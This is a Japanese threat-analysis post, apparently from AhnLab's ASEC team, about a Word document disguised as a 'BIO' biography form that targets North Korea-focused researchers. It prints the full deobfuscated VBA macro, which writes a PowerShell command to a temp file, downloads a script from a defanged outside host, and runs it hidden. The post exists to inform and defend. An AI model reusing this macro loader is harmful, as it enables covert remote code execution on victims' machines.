「BIO 様式」という名前の Word ドキュメントが拡散中

ASEC 分析チームは、先月から継続的に Word ドキュメントを利用した APT 攻撃について掲載してきた。最近、このタイプのマルウェアが「BIO 様式」という名前で頻繁に配布されていることを確認した。これまでの Word ドキュメントの拡散履歴を見ると、当該ファイルも対北朝鮮関連の教授や研究所長をターゲットにして学術伝記(Biography)の様式を装って配布されているものと推定される。

最近拡散が確認されたファイルも Word ファイル内部の External リンクを通して不正なマクロが含まれた dotm ファイルを実行している。以下は8月2日に拡散が確認された「BIO 양식(XX 소장님).docx (翻訳:BIO 様式(XX 所長).docx)」ファイルに含まれていた External リンクである。

[図1] 「BIO 様式(XX 所長).docx」に含まれた External リンク

ダウンロードされた BIO.dotm ファイルには不正なマクロが含まれている。マクロコードは以前と同じ方式で難読化されており、難読化を解除すると以下のようなコードが確認できる。

Private Sub Document_Open()
Set djfeihfidkasljf = CreateObject("Shell.Application")
dfgdfjiejfjdshaj = "powershell.exe"
dfjsdjailfksf = "C:\windows\temp\Ahnlab.log"

skdjfksjkfjkdsfj = "$fjeils={(New-Object Net.WebClient).Dring('hxxp://zenma.getenjoyment.net/ja/ng.txt')};[string]$aiwdf=$fjeils;$ndask=$aiwdf.insert(28,'ownloadst');$bmcns=iex $ndask;iex $bmcns"

Open Trim(dfjsdjailfksf) For Output As #2
       Print #2, skdjfksjkfjkdsfj
    Close #2
	
dfisafkdjaflkjs = "$a='C:\windows\temp\ahnlab.log';$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e"

djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfisafkdjaflkjs, "", "open", 0
Dim SngSec As Single
    SngSec = Timer + 5
Do While Timer < SngSec
        DoEvents
   Loop
Kill (dfjsdjailfksf)
End Sub

従来は特定の URL で直接ダウンロードを試みる Powershellコマンドを実行していたが、このマクロコードはダウンロードコマンドを「Ahnlab.log」ファイルに作成した後、生成したファイルを実行させる方式に変化している。

[図2] 生成された Ahnlab.log ファイル

Word ファイルを開くと実行される Powershellコマンドは、以下のように変化した。

[図3] マクロ実行時に確認されるプロセスツリーの変化(AhnLab RAPIT)

最終的に実行される hxxp://zenma.getenjoyment.net/ja/ng.txt に存在するスクリプトは、以前と同じ機能を実行する。

[図4] Powershell によってダウンロードされる不正なスクリプト

特定のユーザーをターゲットとして External リンクを利用した Word ドキュメントが未だに拡散しており、ユーザーは特に注意が必要である。

V3 では、上記で紹介したファイルに対して以下のように検知している。

[ファイル検知]

  • Downloader/XML.External
  • Downloader/DOC.Agent

[関連ページ]

https://asec.ahnlab.com/jp/25545/

5 1 vote
評価する
guest
0 コメント
Inline Feedbacks
View all comments